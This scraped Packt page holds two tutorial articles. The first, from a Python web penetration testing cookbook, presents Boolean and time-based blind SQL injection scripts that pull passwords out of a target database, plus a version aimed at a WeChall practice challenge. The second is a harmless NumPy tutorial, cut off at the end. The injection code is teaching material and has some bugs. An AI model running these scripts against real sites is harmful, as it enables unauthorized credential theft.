Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials

7009 Articles
article-image-sql-injection
Packt
23 Jun 2015
11 min read
Save for later

SQL Injection

Packt
23 Jun 2015
11 min read
In this article by Cameron Buchanan, Terry Ip, Andrew Mabbitt, Benjamin May, and Dave Mound authors of the book Python Web Penetration Testing Cookbook, we're going to create scripts that encode attack strings, perform attacks, and time normal actions to normalize attack times. (For more resources related to this topic, see here.) Exploiting Boolean SQLi There are times when all you can get from a page is a yes or no. It's heartbreaking until you realise that that's the SQL equivalent of saying "I LOVE YOU". All SQLi can be broken down into yes or no questions, dependant on how patient you are. We will create a script that takes a yes value, and a URL and returns results based on a predefined attack string. I have provided an example attack string but this will change dependant on the system you are testing. How to do it… The following script is how yours should look: import requests import sys   yes = sys.argv[1]   i = 1 asciivalue = 1   answer = [] print "Kicking off the attempt"   payload = {'injection': ''AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'}   while True: req = requests.post('<target url>' data=payload) lengthtest = req.text if yes in lengthtest:    length = i    break else:    i = i+1   for x in range(1, length): while asciivalue < 126: payload = {'injection': ''AND (substr(password, '+str(x)+', 1)) = '+ chr(asciivalue)+';#', 'Submit': 'submit'}    req = requests.post('<target url>', data=payload)    if yes in req.text:    answer.append(chr(asciivalue)) break else:      asciivalue = asciivalue + 1      pass asciivalue = 0 print "Recovered String: "+ ''.join(answer) How it works… Firstly the user must identify a string that only occurs when the SQLi is successful. Alternatively, the script may be altered to respond to the absence of proof of a failed SQLi. We provide this string as a sys.argv. We also create the two iterators we will use in this script and set them to 1 as MySQL starts counting from 1 instead of 0 like the failed system it is. We also create an empty list for our future answer and instruct the user the script is starting. yes = sys.argv[1]   i = 1 asciivalue = 1 answer = [] print "Kicking off the attempt" Our payload here basically requests the length of the password we are attempting to return and compares it to a value that will be iterated: payload = {'injection': ''AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'} We then repeat the next loop forever as we have no idea how long the password is. We submit the payload to the target URL in a POST request: while True: req = requests.post('<target url>' data=payload) Each time we check to see if the yes value we set originally is present in the response text and if so, we end the while loop setting the current value of i as the parameter length. The break command is the part that ends the while loop: lengthtest = req.text if yes in lengthtest:    length = i    break If we don't detect the yes value, we add one to i and continue the loop: else:    i = i+1re Using the identified length of the target string, we iterate through each character and, using the ascii value, each possible value of that character. For each value we submit it to the target URL. Because the ascii table only runs up to 127, we cap the loop to run until the ascii value has reached 126. If it reaches 127, something has gone wrong: for x in range(1, length): while asciivalue < 126:  payload = {'injection': ''AND (substr(password, '+str(x)+', 1)) = '+ chr(asciivalue)+';#', 'Submit': 'submit'}    req = requests.post('<target url>', data=payload) We check to see if our yes string is present in the response and if so, break to go onto the next character. We append our successful to our answer string in character form, converting it with the chr command: if yes in req.text:    answer.append(chr(asciivalue)) break If the yes value is not present, we add to the ascii value to move onto the next potential character for that position and pass: else:      asciivalue = asciivalue + 1      pass Finally we reset ascii value for each loop and then when the loop hits the length of the string, we finish, printing the whole recovered string: asciivalue = 1 print "Recovered String: "+ ''.join(answer) There's more… This script could be potentially altered to handle iterating through tables and recovering multiple values through better crafted SQL Injection strings. Ultimately, this provides a base plate, as with the later Blind SQL Injection script for developing more complicated and impressive scripts to handle challenging tasks. See the Blind SQL Injection script for an advanced implementation of these concepts. Exploiting Blind SQL Injection Sometimes life hands you lemons, Blind SQL Injection points are some of those lemons. When you're reasonably sure you've found an SQL Injection vulnerability but there are no errors and you can't get it to return you data. In these situations you can use timing commands within SQL to cause the page to pause in returning a response and then use that timing to make judgements about the database and its data. We will create a script that makes requests to the server and returns differently timed responses dependant on the characters it's requesting. It will then read those times and reassemble strings. How to do it… The script is as follows: import requests   times = [] print "Kicking off the attempt" cookies = {'cookie name': 'Cookie value'}   payload = {'injection': ''or sleep char_length(password);#', 'Submit': 'submit'} req = requests.post('<target url>' data=payload, cookies=cookies) firstresponsetime = str(req.elapsed.total_seconds)   for x in range(1, firstresponsetime): payload = {'injection': ''or sleep(ord(substr(password, '+str(x)+', 1)));#', 'Submit': 'submit'} req = requests.post('<target url>', data=payload, cookies=cookies) responsetime = req.elapsed.total_seconds a = chr(responsetime)    times.append(a)    answer = ''.join(times) print "Recovered String: "+ answer How it works… As ever we import the required libraries and declare the lists we need to fill later on. We also have a function here that states that the script has indeed started. With some time-based functions, the user can be left waiting a while. In this script I have also included cookies using the request library. It is likely for this sort of attack that authentication is required: times = [] print "Kicking off the attempt" cookies = {'cookie name': 'Cookie value'} We set our payload up in a dictionary along with a submit button. The attack string is simple enough to understand with explanation. The initial tick has to be escaped to be treated as text within the dictionary. That tick breaks the SQL command initially and allows us to input our own SQL commands. Next we say in the event of the first command failing perform the following command with OR. We then tell the server to sleep one second for every character in the first row in the password column. Finally we close the statement with a semi-colon and comment out any trailing characters with a hash (or pound if you're American and/or wrong): payload = {'injection': ''or sleep char_length(password);#', 'Submit': 'submit'} We then set length of time the server took to respond as the firstreponsetime parameter. We will use this to understand how many characters we need to brute-force through this method in the following chain: firstresponsetime = str(req.elapsed).total_seconds We create a loop which will set x to be all numbers from 1 to the length of the string identified and perform an action for each one. We start from 1 here because MySQL starts counting from 1 rather than from zero like Python: for x in range(1, firstresponsetime): We make a similar payload as before but this time we are saying sleep for the ascii value of X character of the password in the password column, row one. So if the first character was a lower case a then the corresponding ascii value is 97 and therefore the system would sleep for 97 seconds, if it was a lower case b it would sleep for 98 seconds and so on: payload = {'injection': ''or sleep(ord(substr(password, '+str(x)+', 1)));#', 'Submit': 'submit'} We submit our data each time for each character place in the string: req = requests.post('<target url>', data=payload, cookies=cookies) We take the response time from each request to record how long the server sleeps and then convert that time back from an ascii value into a letter: responsetime = req.elapsed.total_seconds a = chr(responsetime) For each iteration we print out the password as it is currently known and then eventually print out the full password: answer = ''.join(times) print "Recovered String: "+ answer There's more… This script provides a framework that can be adapted to many different scenarios. Wechall, the web app challenge website, sets a time-limited, blind SQLi challenge that has to be completed in a very short time period. The following is our original script adapted to this environment. As you can see, I've had to account for smaller time differences in differing values, server lag and also incorporated a checking method to reset the testing value each time and submit it automatically: import subprocess import requests   def round_down(num, divisor):    return num - (num%divisor)   subprocess.Popen(["modprobe pcspkr"], shell=True) subprocess.Popen(["beep"], shell=True)     values = {'0': '0', '25': '1', '50': '2', '75': '3', '100': '4', '125': '5', '150': '6', '175': '7', '200': '8', '225': '9', '250': 'A', '275': 'B', '300': 'C', '325': 'D', '350': 'E', '375': 'F'} times = [] answer = "This is the first time" cookies = {'wc': 'cookie'} setup = requests.get('http://www.wechall.net/challenge/blind_lighter/ index.php?mo=WeChall&me=Sidebar2&rightpanel=0', cookies=cookies) y=0 accum=0   while 1: reset = requests.get('http://www.wechall.net/challenge/blind_lighter/ index.php?reset=me', cookies=cookies) for line in reset.text.splitlines():    if "last hash" in line:      print "the old hash was:"+line.split("      ")[20].strip(".</li>")      print "the guessed hash:"+answer      print "Attempts reset n n"    for x in range(1, 33):      payload = {'injection': ''or IF (ord(substr(password,      '+str(x)+', 1)) BETWEEN 48 AND      57,sleep((ord(substr(password, '+str(x)+', 1))-      48)/4),sleep((ord(substr(password, '+str(x)+', 1))-      55)/4));#', 'inject': 'Inject'}      req = requests.post('http://www.wechall.net/challenge/blind_lighter/ index.php?ajax=1', data=payload, cookies=cookies)      responsetime = str(req.elapsed)[5]+str(req.elapsed)[6]+str(req.elapsed) [8]+str(req.elapsed)[9]      accum = accum + int(responsetime)      benchmark = int(15)      benchmarked = int(responsetime) - benchmark      rounded = str(round_down(benchmarked, 25))      if rounded in values:        a = str(values[rounded])        times.append(a)        answer = ''.join(times)      else:        print rounded        rounded = str("375")        a = str(values[rounded])        times.append(a)        answer = ''.join(times) submission = {'thehash': str(answer), 'mybutton': 'Enter'} submit = requests.post('http://www.wechall.net/challenge/blind_lighter/ index.php', data=submission, cookies=cookies) print "Attempt: "+str(y) print "Time taken: "+str(accum) y += 1 for line in submit.text.splitlines():    if "slow" in line:      print line.strip("<li>")    elif "wrong" in line:       print line.strip("<li>") if "wrong" not in submit.text:    print "possible success!"    #subprocess.Popen(["beep"], shell=True) Summary We looked at how to attack strings through different penetration attacks via Boolean SQLi and Blind SQL Injection. You will find some various kinds of attacks present in the book throughout. Resources for Article: Further resources on this subject: Pentesting Using Python [article] Wireless and Mobile Hacks [article] Introduction to the Nmap Scripting Engine [article]
Read more
  • 0
  • 0
  • 8207

article-image-moving-further-numpy-modules
Packt
23 Jun 2015
23 min read
Save for later

Moving Further with NumPy Modules

Packt
23 Jun 2015
23 min read
NumPy has a number of modules inherited from its predecessor, Numeric. Some of these packages have a SciPy counterpart, which may have fuller functionality. In this article by Ivan Idris author of the book NumPy: Beginner's Guide - Third Edition we will cover the following topics: The linalg package The fft package Random numbers Continuous and discrete distributions (For more resources related to this topic, see here.) Linear algebra Linear algebra is an important branch of mathematics. The numpy.linalg package contains linear algebra functions. With this module, you can invert matrices, calculate eigenvalues, solve linear equations, and determine determinants, among other things (see http://docs.scipy.org/doc/numpy/reference/routines.linalg.html). Time for action – inverting matrices The inverse of a matrix A in linear algebra is the matrix A-1, which, when multiplied with the original matrix, is equal to the identity matrix I. This can be written as follows: A A-1 = I The inv() function in the numpy.linalg package can invert an example matrix with the following steps: Create the example matrix with the mat() function: A = np.mat("0 1 2;1 0 3;4 -3 8") print("An", A) The A matrix appears as follows: A [[ 0 1 2] [ 1 0 3] [ 4 -3 8]] Invert the matrix with the inv() function: inverse = np.linalg.inv(A) print("inverse of An", inverse) The inverse matrix appears as follows: inverse of A [[-4.5 7. -1.5] [-2.   4. -1. ] [ 1.5 -2.   0.5]] If the matrix is singular, or not square, a LinAlgError is raised. If you want, you can check the result manually with a pen and paper. This is left as an exercise for the reader. Check the result by multiplying the original matrix with the result of the inv() function: print("Checkn", A * inverse) The result is the identity matrix, as expected: Check [[ 1. 0. 0.] [ 0. 1. 0.] [ 0. 0. 1.]] What just happened? We calculated the inverse of a matrix with the inv() function of the numpy.linalg package. We checked, with matrix multiplication, whether this is indeed the inverse matrix (see inversion.py): from __future__ import print_function import numpy as np   A = np.mat("0 1 2;1 0 3;4 -3 8") print("An", A)   inverse = np.linalg.inv(A) print("inverse of An", inverse)   print("Checkn", A * inverse) Pop quiz – creating a matrix Q1. Which function can create matrices? array create_matrix mat vector Have a go hero – inverting your own matrix Create your own matrix and invert it. The inverse is only defined for square matrices. The matrix must be square and invertible; otherwise, a LinAlgError exception is raised. Solving linear systems A matrix transforms a vector into another vector in a linear way. This transformation mathematically corresponds to a system of linear equations. The numpy.linalg function solve() solves systems of linear equations of the form Ax = b, where A is a matrix, b can be a one-dimensional or two-dimensional array, and x is an unknown variable. We will see the dot() function in action. This function returns the dot product of two floating-point arrays. The dot() function calculates the dot product (see https://www.khanacademy.org/math/linear-algebra/vectors_and_spaces/dot_cross_products/v/vector-dot-product-and-vector-length). For a matrix A and vector b, the dot product is equal to the following sum: Time for action – solving a linear system Solve an example of a linear system with the following steps: Create A and b: A = np.mat("1 -2 1;0 2 -8;-4 5 9") print("An", A) b = np.array([0, 8, -9]) print("bn", b) A and b appear as follows: Solve this linear system with the solve() function: x = np.linalg.solve(A, b) print("Solution", x) The solution of the linear system is as follows: Solution [ 29. 16.   3.] Check whether the solution is correct with the dot() function: print("Checkn", np.dot(A , x)) The result is as expected: Check [[ 0. 8. -9.]] What just happened? We solved a linear system using the solve() function from the NumPy linalg module and checked the solution with the dot() function: from __future__ import print_function import numpy as np   A = np.mat("1 -2 1;0 2 -8;-4 5 9") print("An", A)   b = np.array([0, 8, -9]) print("bn", b)   x = np.linalg.solve(A, b) print("Solution", x)   print("Checkn", np.dot(A , x)) Finding eigenvalues and eigenvectors Eigenvalues are scalar solutions to the equation Ax = ax, where A is a two-dimensional matrix and x is a one-dimensional vector. Eigenvectors are vectors corresponding to eigenvalues (see https://www.khanacademy.org/math/linear-algebra/alternate_bases/eigen_everything/v/linear-algebra-introduction-to-eigenvalues-and-eigenvectors). The eigvals() function in the numpy.linalg package calculates eigenvalues. The eig() function returns a tuple containing eigenvalues and eigenvectors. Time for action – determining eigenvalues and eigenvectors Let's calculate the eigenvalues of a matrix: Create a matrix as shown in the following: A = np.mat("3 -2;1 0") print("An", A) The matrix we created looks like the following: A [[ 3 -2] [ 1 0]] Call the eigvals() function: print("Eigenvalues", np.linalg.eigvals(A)) The eigenvalues of the matrix are as follows: Eigenvalues [ 2. 1.] Determine eigenvalues and eigenvectors with the eig() function. This function returns a tuple, where the first element contains eigenvalues and the second element contains corresponding eigenvectors, arranged column-wise: eigenvalues, eigenvectors = np.linalg.eig(A) print("First tuple of eig", eigenvalues) print("Second tuple of eign", eigenvectors) The eigenvalues and eigenvectors appear as follows: First tuple of eig [ 2. 1.] Second tuple of eig [[ 0.89442719 0.70710678] [ 0.4472136   0.70710678]] Check the result with the dot() function by calculating the right and left side of the eigenvalues equation Ax = ax: for i, eigenvalue in enumerate(eigenvalues):      print("Left", np.dot(A, eigenvectors[:,i]))      print("Right", eigenvalue * eigenvectors[:,i])      print() The output is as follows: Left [[ 1.78885438] [ 0.89442719]] Right [[ 1.78885438] [ 0.89442719]] What just happened? We found the eigenvalues and eigenvectors of a matrix with the eigvals() and eig() functions of the numpy.linalg module. We checked the result using the dot() function (see eigenvalues.py): from __future__ import print_function import numpy as np   A = np.mat("3 -2;1 0") print("An", A)   print("Eigenvalues", np.linalg.eigvals(A) )   eigenvalues, eigenvectors = np.linalg.eig(A) print("First tuple of eig", eigenvalues) print("Second tuple of eign", eigenvectors)   for i, eigenvalue in enumerate(eigenvalues):      print("Left", np.dot(A, eigenvectors[:,i]))      print("Right", eigenvalue * eigenvectors[:,i])      print() Singular value decomposition Singular value decomposition (SVD) is a type of factorization that decomposes a matrix into a product of three matrices. The SVD is a generalization of the previously discussed eigenvalue decomposition. SVD is very useful for algorithms such as the pseudo inverse, which we will discuss in the next section. The svd() function in the numpy.linalg package can perform this decomposition. This function returns three matrices U, ?, and V such that U and V are unitary and ? contains the singular values of the input matrix: The asterisk denotes the Hermitian conjugate or the conjugate transpose. The complex conjugate changes the sign of the imaginary part of a complex number and is therefore not relevant for real numbers. A complex square matrix A is unitary if A*A = AA* = I (the identity matrix). We can interpret SVD as a sequence of three operations—rotation, scaling, and another rotation. We already transposed matrices in this article. The transpose flips matrices, turning rows into columns, and columns into rows. Time for action – decomposing a matrix It's time to decompose a matrix with the SVD using the following steps: First, create a matrix as shown in the following: A = np.mat("4 11 14;8 7 -2") print("An", A) The matrix we created looks like the following: A [[ 4 11 14] [ 8 7 -2]] Decompose the matrix with the svd() function: U, Sigma, V = np.linalg.svd(A, full_matrices=False) print("U") print(U) print("Sigma") print(Sigma) print("V") print(V) Because of the full_matrices=False specification, NumPy performs a reduced SVD decomposition, which is faster to compute. The result is a tuple containing the two unitary matrices U and V on the left and right, respectively, and the singular values of the middle matrix: U [[-0.9486833 -0.31622777]   [-0.31622777 0.9486833 ]] Sigma [ 18.97366596   9.48683298] V [[-0.33333333 -0.66666667 -0.66666667] [ 0.66666667 0.33333333 -0.66666667]] We do not actually have the middle matrix—we only have the diagonal values. The other values are all 0. Form the middle matrix with the diag() function. Multiply the three matrices as follows: print("Productn", U * np.diag(Sigma) * V) The product of the three matrices is equal to the matrix we created in the first step: Product [[ 4. 11. 14.] [ 8.   7. -2.]] What just happened? We decomposed a matrix and checked the result by matrix multiplication. We used the svd() function from the NumPy linalg module (see decomposition.py): from __future__ import print_function import numpy as np   A = np.mat("4 11 14;8 7 -2") print("An", A)   U, Sigma, V = np.linalg.svd(A, full_matrices=False)   print("U") print(U)   print("Sigma") print(Sigma)   print("V") print(V)   print("Productn", U * np.diag(Sigma) * V) Pseudo inverse The Moore-Penrose pseudo inverse of a matrix can be computed with the pinv() function of the numpy.linalg module (see http://en.wikipedia.org/wiki/Moore%E2%80%93Penrose_pseudoinverse). The pseudo inverse is calculated using the SVD (see previous example). The inv() function only accepts square matrices; the pinv() function does not have this restriction and is therefore considered a generalization of the inverse. Time for action – computing the pseudo inverse of a matrix Let's compute the pseudo inverse of a matrix: First, create a matrix: A = np.mat("4 11 14;8 7 -2") print("An", A) The matrix we created looks like the following: A [[ 4 11 14] [ 8 7 -2]] Calculate the pseudo inverse matrix with the pinv() function: pseudoinv = np.linalg.pinv(A) print("Pseudo inversen", pseudoinv) The pseudo inverse result is as follows: Pseudo inverse [[-0.00555556 0.07222222] [ 0.02222222 0.04444444] [ 0.05555556 -0.05555556]] Multiply the original and pseudo inverse matrices: print("Check", A * pseudoinv) What we get is not an identity matrix, but it comes close to it: Check [[ 1.00000000e+00   0.00000000e+00] [ 8.32667268e-17   1.00000000e+00]] What just happened? We computed the pseudo inverse of a matrix with the pinv() function of the numpy.linalg module. The check by matrix multiplication resulted in a matrix that is approximately an identity matrix (see pseudoinversion.py): from __future__ import print_function import numpy as np   A = np.mat("4 11 14;8 7 -2") print("An", A)   pseudoinv = np.linalg.pinv(A) print("Pseudo inversen", pseudoinv)   print("Check", A * pseudoinv) Determinants The determinant is a value associated with a square matrix. It is used throughout mathematics; for more details, please refer to http://en.wikipedia.org/wiki/Determinant. For a n x n real value matrix, the determinant corresponds to the scaling a n-dimensional volume undergoes when transformed by the matrix. The positive sign of the determinant means the volume preserves its orientation (clockwise or anticlockwise), while a negative sign means reversed orientation. The numpy.linalg module has a det() function that returns the determinant of a matrix. Time for action – calculating the determinant of a matrix To calculate the determinant of a matrix, follow these steps: Create the matrix: A = np.mat("3 4;5 6") print("An", A) The matrix we created appears as follows: A [[ 3. 4.] [ 5. 6.]] Compute the determinant with the det() function: print("Determinant", np.linalg.det(A)) The determinant appears as follows: Determinant -2.0 What just happened? We calculated the determinant of a matrix with the det() function from the numpy.linalg module (see determinant.py): from __future__ import print_function import numpy as np   A = np.mat("3 4;5 6") print("An", A)   print("Determinant", np.linalg.det(A)) Fast Fourier transform The Fast Fourier transform (FFT) is an efficient algorithm to calculate the discrete Fourier transform (DFT). The Fourier series represents a signal as a sum of sine and cosine terms. FFT improves on more naïve algorithms and is of order O(N log N). DFT has applications in signal processing, image processing, solving partial differential equations, and more. NumPy has a module called fft that offers FFT functionality. Many functions in this module are paired; for those functions, another function does the inverse operation. For instance, the fft() and ifft() function form such a pair. Time for action – calculating the Fourier transform First, we will create a signal to transform. Calculate the Fourier transform with the following steps: Create a cosine wave with 30 points as follows: x = np.linspace(0, 2 * np.pi, 30) wave = np.cos(x) Transform the cosine wave with the fft() function: transformed = np.fft.fft(wave) Apply the inverse transform with the ifft() function. It should approximately return the original signal. Check with the following line: print(np.all(np.abs(np.fft.ifft(transformed) - wave)   < 10 ** -9)) The result appears as follows: True Plot the transformed signal with matplotlib: plt.plot(transformed) plt.title('Transformed cosine') plt.xlabel('Frequency') plt.ylabel('Amplitude') plt.grid() plt.show() The following resulting diagram shows the FFT result: What just happened? We applied the fft() function to a cosine wave. After applying the ifft() function, we got our signal back (see fourier.py): from __future__ import print_function import numpy as np import matplotlib.pyplot as plt     x = np.linspace(0, 2 * np.pi, 30) wave = np.cos(x) transformed = np.fft.fft(wave) print(np.all(np.abs(np.fft.ifft(transformed) - wave) < 10 ** -9))   plt.plot(transformed) plt.title('Transformed cosine') plt.xlabel('Frequency') plt.ylabel('Amplitude') plt.grid() plt.show() Shifting The fftshift() function of the numpy.linalg module shifts zero-frequency components to the center of a spectrum. The zero-frequency component corresponds to the mean of the signal. The ifftshift() function reverses this operation. Time for action – shifting frequencies We will create a signal, transform it, and then shift the signal. Shift the frequencies with the following steps: Create a cosine wave with 30 points: x = np.linspace(0, 2 * np.pi, 30) wave = np.cos(x) Transform the cosine wave with the fft() function: transformed = np.fft.fft(wave) Shift the signal with the fftshift() function: shifted = np.fft.fftshift(transformed) Reverse the shift with the ifftshift() function. This should undo the shift. Check with the following code snippet: print(np.all((np.fft.ifftshift(shifted) - transformed)   < 10 ** -9)) The result appears as follows: True Plot the signal and transform it with matplotlib: plt.plot(transformed, lw=2, label="Transformed") plt.plot(shifted, '--', lw=3, label="Shifted") plt.title('Shifted and transformed cosine wave') plt.xlabel('Frequency') plt.ylabel('Amplitude') plt.grid() plt.legend(loc='best') plt.show() The following diagram shows the effect of the shift and the FFT: What just happened? We applied the fftshift() function to a cosine wave. After applying the ifftshift() function, we got our signal back (see fouriershift.py): import numpy as np import matplotlib.pyplot as plt     x = np.linspace(0, 2 * np.pi, 30) wave = np.cos(x) transformed = np.fft.fft(wave) shifted = np.fft.fftshift(transformed) print(np.all(np.abs(np.fft.ifftshift(shifted) - transformed) < 10 ** -9))   plt.plot(transformed, lw=2, label="Transformed") plt.plot(shifted, '--', lw=3, label="Shifted") plt.title('Shifted and transformed cosine wave') plt.xlabel('Frequency') plt.ylabel('Amplitude') plt.grid() plt.legend(loc='best') plt.show() Random numbers Random numbers are used in Monte Carlo methods, stochastic calculus, and more. Real random numbers are hard to generate, so, in practice, we use pseudo random numbers, which are random enough for most intents and purposes, except for some very special cases. These numbers appear random, but if you analyze them more closely, you will realize that they follow a certain pattern. The random numbers-related functions are in the NumPy random module. The core random number generator is based on the Mersenne Twister algorithm—a standard and well-known algorithm (see https://en.wikipedia.org/wiki/Mersenne_Twister). We can generate random numbers from discrete or continuous distributions. The distribution functions have an optional size parameter, which tells NumPy how many numbers to generate. You can specify either an integer or a tuple as size. This will result in an array filled with random numbers of appropriate shape. Discrete distributions include the geometric, hypergeometric, and binomial distributions. Time for action – gambling with the binomial The binomial distribution models the number of successes in an integer number of independent trials of an experiment, where the probability of success in each experiment is a fixed number (see https://www.khanacademy.org/math/probability/random-variables-topic/binomial_distribution). Imagine a 17th century gambling house where you can bet on flipping pieces of eight. Nine coins are flipped. If less than five are heads, then you lose one piece of eight, otherwise you win one. Let's simulate this, starting with 1,000 coins in our possession. Use the binomial() function from the random module for that purpose. To understand the binomial() function, look at the following section: Initialize an array, which represents the cash balance, to zeros. Call the binomial() function with a size of 10000. This represents 10,000 coin flips in our casino: cash = np.zeros(10000) cash[0] = 1000 outcome = np.random.binomial(9, 0.5, size=len(cash)) Go through the outcomes of the coin flips and update the cash array. Print the minimum and maximum of the outcome, just to make sure we don't have any strange outliers: for i in range(1, len(cash)):    if outcome[i] < 5:      cash[i] = cash[i - 1] - 1    elif outcome[i] < 10:      cash[i] = cash[i - 1] + 1    else:      raise AssertionError("Unexpected outcome " + outcome)   print(outcome.min(), outcome.max()) As expected, the values are between 0 and 9. In the following diagram, you can see the cash balance performing a random walk: What just happened? We did a random walk experiment using the binomial() function from the NumPy random module (see headortail.py): from __future__ import print_function import numpy as np import matplotlib.pyplot as plt     cash = np.zeros(10000) cash[0] = 1000 np.random.seed(73) outcome = np.random.binomial(9, 0.5, size=len(cash))   for i in range(1, len(cash)):    if outcome[i] < 5:      cash[i] = cash[i - 1] - 1    elif outcome[i] < 10:      cash[i] = cash[i - 1] + 1    else:      raise AssertionError("Unexpected outcome " + outcome)   print(outcome.min(), outcome.max())   plt.plot(np.arange(len(cash)), cash) plt.title('Binomial simulation') plt.xlabel('# Bets') plt.ylabel('Cash') plt.grid() plt.show() Hypergeometric distribution The hypergeometricdistribution models a jar with two types of objects in it. The model tells us how many objects of one type we can get if we take a specified number of items out of the jar without replacing them (see https://en.wikipedia.org/wiki/Hypergeometric_distribution). The NumPy random module has a hypergeometric() function that simulates this situation. Time for action – simulating a game show Imagine a game show where every time the contestants answer a question correctly, they get to pull three balls from a jar and then put them back. Now, there is a catch, one ball in the jar is bad. Every time it is pulled out, the contestants lose six points. If, however, they manage to get out 3 of the 25 normal balls, they get one point. So, what is going to happen if we have 100 questions in total? Look at the following section for the solution: Initialize the outcome of the game with the hypergeometric() function. The first parameter of this function is the number of ways to make a good selection, the second parameter is the number of ways to make a bad selection, and the third parameter is the number of items sampled: points = np.zeros(100) outcomes = np.random.hypergeometric(25, 1, 3, size=len(points)) Set the scores based on the outcomes from the previous step: for i in range(len(points)):    if outcomes[i] == 3:      points[i] = points[i - 1] + 1    elif outcomes[i] == 2:      points[i] = points[i - 1] - 6    else:     print(outcomes[i]) The following diagram shows how the scoring evolved: What just happened? We simulated a game show using the hypergeometric() function from the NumPy random module. The game scoring depends on how many good and how many bad balls the contestants pulled out of a jar in each session (see urn.py): from __future__ import print_function import numpy as np import matplotlib.pyplot as plt     points = np.zeros(100) np.random.seed(16) outcomes = np.random.hypergeometric(25, 1, 3, size=len(points))   for i in range(len(points)):    if outcomes[i] == 3:      points[i] = points[i - 1] + 1    elif outcomes[i] == 2:      points[i] = points[i - 1] - 6    else:      print(outcomes[i])   plt.plot(np.arange(len(points)), points) plt.title('Game show simulation') plt.xlabel('# Rounds') plt.ylabel('Score') plt.grid() plt.show() Continuous distributions We usually model continuous distributions with probability density functions (PDF). The probability that a value is in a certain interval is determined by integration of the PDF (see https://www.khanacademy.org/math/probability/random-variables-topic/random_variables_prob_dist/v/probability-density-functions). The NumPy random module has functions that represent continuous distributions—beta(), chisquare(), exponential(), f(), gamma(), gumbel(), laplace(), lognormal(), logistic(), multivariate_normal(), noncentral_chisquare(), noncentral_f(), normal(), and others. Time for action – drawing a normal distribution We can generate random numbers from a normal distribution and visualize their distribution with a histogram (see https://www.khanacademy.org/math/probability/statistics-inferential/normal_distribution/v/introduction-to-the-normal-distribution). Draw a normal distribution with the following steps: Generate random numbers for a given sample size using the normal() function from the random NumPy module: N=10000 normal_values = np.random.normal(size=N) Draw the histogram and theoretical PDF with a center value of 0 and standard deviation of 1. Use matplotlib for this purpose: _, bins, _ = plt.hist(normal_values,   np.sqrt(N), normed=True, lw=1) sigma = 1 mu = 0 plt.plot(bins, 1/(sigma * np.sqrt(2 * np.pi))   * np.exp( - (bins - mu)**2 / (2 * sigma**2) ),lw=2) plt.show() In the following diagram, we see the familiar bell curve: What just happened? We visualized the normal distribution using the normal() function from the random NumPy module. We did this by drawing the bell curve and a histogram of randomly generated values (see normaldist.py): import numpy as np import matplotlib.pyplot as plt   N=10000   np.random.seed(27) normal_values = np.random.normal(size=N) _, bins, _ = plt.hist(normal_values, np.sqrt(N), normed=True, lw=1, label="Histogram") sigma = 1 mu = 0 plt.plot(bins, 1/(sigma * np.sqrt(2 * np.pi)) * np.exp( - (bins - mu)**2 / (2 * sigma**2) ), '--', lw=3, label="PDF") plt.title('Normal distribution') plt.xlabel('Value') plt.ylabel('Normalized Frequency') plt.grid() plt.legend(loc='best') plt.show() Lognormal distribution A lognormal distribution is a distribution of a random variable whose natural logarithm is normally distributed. The lognormal() function of the random NumPy module models this distribution. Time for action – drawing the lognormal distribution Let's visualize the lognormal distribution and its PDF with a histogram: Generate random numbers using the normal() function from the random NumPy module: N=10000 lognormal_values = np.random.lognormal(size=N) Draw the histogram and theoretical PDF with a center value of 0 and standard deviation of 1: _, bins, _ = plt.hist(lognormal_values,   np.sqrt(N), normed=True, lw=1) sigma = 1 mu = 0 x = np.linspace(min(bins), max(bins), len(bins)) pdf = np.exp(-(numpy.log(x) - mu)**2 / (2 * sigma**2))/ (x *   sigma * np.sqrt(2 * np.pi)) plt.plot(x, pdf,lw=3) plt.show() The fit of the histogram and theoretical PDF is excellent, as you can see in the following diagram: What just happened? We visualized the lognormal distribution using the lognormal() function from the random NumPy module. We did this by drawing the curve of the theoretical PDF and a histogram of randomly generated values (see lognormaldist.py): import numpy as np import matplotlib.pyplot as plt   N=10000 np.random.seed(34) lognormal_values = np.random.lognormal(size=N) _, bins, _ = plt.hist(lognormal_values,   np.sqrt(N), normed=True, lw=1, label="Histogram") sigma = 1 mu = 0 x = np.linspace(min(bins), max(bins), len(bins)) pdf = np.exp(-(np.log(x) - mu)**2 / (2 * sigma**2))/ (x * sigma * np.sqrt(2 * np.pi)) plt.xlim([0, 15]) plt.plot(x, pdf,'--', lw=3, label="PDF") plt.title('Lognormal distribution') plt.xlabel('Value') plt.ylabel('Normalized frequency') plt.grid() plt.legend(loc='best') plt.show() Bootstrapping in statistics Bootstrapping is a method used to estimate variance, accuracy, and other metrics of sample estimates, such as the arithmetic mean. The simplest bootstrapping procedure consists of the following steps: Generate a large number of samples from the original data sample having the same size N. You can think of the original data as a jar containing numbers. We create the new samples by N times randomly picking a number from the jar. Each time we return the number into the jar, so a number can occur multiple times in a generated sample. With the new samples, we calculate the statistical estimate under investigation for each sample (for example, the arithmetic mean). This gives us a sample of possible values for the estimator. Time for action – sampling with numpy.random.choice() We will use the numpy.random.choice() function to perform bootstrapping. Start the IPython or Python shell and import NumPy: $ ipython In [1]: import numpy as np Generate a data sample following the normal distribution: In [2]: N = 500   In [3]: np.random.seed(52)   In [4]: data = np.random.normal(size=N)   Calculate the mean of the data: In [5]: data.mean() Out[5]: 0.07253250605445645 Generate 100 samples from the original data and calculate their means (of course, more samples may lead to a more accurate result): In [6]: bootstrapped = np.random.choice(data, size=(N, 100))   In [7]: means = bootstrapped.mean(axis=0)   In [8]: means.shape Out[8]: (100,) Calculate the mean, variance, and standard deviation of the arithmetic means we obtained: In [9]: means.mean() Out[9]: 0.067866373318115278   In [10]: means.var() Out[10]: 0.001762807104774598   In [11]: means.std() Out[11]: 0.041985796464692651 If we are assuming a normal distribution for the means, it may be relevant to know the z-score, which is defined as follows: In [12]: (data.mean() - means.mean())/means.std() Out[12]: 0.11113598238549766 From the z-score value, we get an idea of how probable the actual mean is. What just happened? We bootstrapped a data sample by generating samples and calculating the means of each sample. Then we computed the mean, standard deviation, variance, and z-score of the means. We used the numpy.random.choice() function for 